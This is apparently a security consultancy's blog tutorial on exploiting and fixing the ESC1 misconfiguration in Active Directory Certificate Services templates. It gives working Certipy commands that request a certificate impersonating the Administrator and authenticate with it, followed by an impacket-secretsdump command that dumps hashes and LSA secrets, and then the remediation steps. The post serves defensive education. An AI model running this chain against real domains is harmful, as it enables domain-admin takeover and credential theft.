Certificates are crucial in establishing trust and securing communication within the Active Directory environment. They are used for authentication, encryption, and digital signatures. Certificate Templates are predefined configurations that define the properties and settings for the certificates issued by the Active Directory Certificate Authority (CA). These templates help standardize certificate issuance and ensure certificates adhere to specific security requirements. An attacker can use these templates to escalate privileges from domain users to that of a domain admin if they are not configured correctly. In this blog, we will discuss what a vulnerable template is and how to exploit and fix it.
Active Directory Certificate Services (AD CS) Templates
Active Directory Certificate Services (AD CS) templates are predefined certificate request configurations that allow administrators to define the characteristics of certificates that will be issued by the CA (Certificate Authority). Templates serve as blueprints for different types of certificates and their properties, making it easier to manage and issue certificates with consistent settings across an organization’s PKI (Public Key Infrastructure).
Administrators can streamline requesting, issuing, and managing certificates within an organization using templates. Templates ensure consistency, simplify the certificate issuance process, and help maintain security standards by enforcing specific configurations for different certifications.
Active Directory Certificate Services (AD CS) Vulnerable Templates
Templates, by default, are not vulnerable but made vulnerable by human-made misconfigurations. When writing this blog, these misconfigurations are divided into 11 parts (ESC1-ESC11). In this blog, we will exploit ESC1 misconfiguration in a template.
By exploiting this type of vulnerable Template, a domain user can escalate his privileges to that of a domain administrator in a Windows Active Directory Environment.
Exploiting ESC1
For exploiting ESC1, we need the Template to meet certain criteria. The Template must have:
- Enrollment Rights are set for the group our user belongs to so that we can request a new certificate from the Certificate Authority (CA).
- Extended Key Usage: Client Authentication means the generated certificate based on this Template can authenticate to the domain computers.
- Enrollee Supplies Subject set to True, which means we can supply SAN (Subject Alternate Name)
- No Manager Approval is required, which means the request is auto-approved.
Step to Exploit Misconfigured Certificate Template – ESC1
1) Certipy is a tool used for finding and exploiting certificates in Active Directory.
2) Run certipy against the domain controller to find any vulnerable templates.
certipy find -vulnerable -dc-ip 192.168.0.144 -u Guts@ACU.local -p 'P@ssw0rd!'
-u: Domain User -p: Domain User Password -dc-ip: Domain Controller IP Domain: ACU.local
3) Cat the created text file by certipy to see the vulnerable Template.
From the above image, it is clear that enrollment rights are set for Domain Users, Enrollee Supplies Subject is set to True, and Extended Key Usage has Client Authentication.
4) Request a certificate and supply the Administrator’s SAN (Subject Alternate Name).
certipy req -dc-ip 192.168.0.144 -u Guts@ACU.local -p 'P@ssw0rd!' -ca ACU-ANIKATE-DC-CA -target ANIKATE-DC.ACU.local -template ESC1 -upn Administrator@ACU.local -dns Anikate-DC.ACU.local
- ca: Certificate Authority (ACU-ANIKATE-DC-CA in this case)
- target: CA Hostname (ANIKATE-DC.ACU.local in this case)
- Template: Name of the vulnerable Template (ESC1 in this case)
- upn: Target Username (Administrator in this case)
- dns: DNS Server (Anikate-DC.ACU.local in this case)
5) Authenticate against the domain controller using the certificate.
certipy auth -pfx administrator_anikate-dc.pfx -dc-ip 192.168.0.144
auth: which identity to authenticate as (We are establishing as Administrator, so use 0, i.e., UPN: Administrator@ACU.local)
-pfx: Saved Certificate (administrator_anikate-dc.pfx in this case)
Now, we attempt to show the domain controller using the certificate and get the TGT (Ticket Granting Ticket); the domain controller will attach the NTLM hash of the user with TGT.
6) Now, we dump hashes and LSA secrets using secretsdump.
impacket-secretsdump -hashes' aad3b435b51404eeaad3b435b51404ee:9a0c89751f9ac637242da5ac889fa3aa' 'ACU.local/Administrator@192.168.0.144.'
Fixing the Misconfigured Certificate Template – ESC1
1) Open the Server Manager on your Certificate Authority.
2) Click on Tools and then Certification Authority.
3) Right Click on Certificate Templates and click on Manage.
4) Right Click on the vulnerable Template and click on Properties.
5) Go to Issuance Requirements and Check the CA certificate manager approval box.
6) Go to Subject Name, select Build from this Active Directory information instead of Supply in the request, and click Apply.
7) Go to Security, select Domain Users Group, uncheck the enroll box, and then click Apply and OK.
8) Now rerun the certipy.
9) Cat the created text file by certipy to see if the vulnerable Template exists.
Certipy could not find any vulnerable templates.
TL;DR
Attackers can escalate their privileges from domain users to domain admins by exploiting the misconfiguration of certificate templates that are not vulnerable by default but due to human-made misconfigurations. For exploitation, we need the Template to meet certain requirements. We can supply SAN (Subject Alternate Name), manager approval set to False, the group members our user belongs to can enroll (enrollment rights for our user group), and Template allows client authentication.
Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you want to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
“Join us on our journey of growth and development by signing up for our comprehensive courses.“
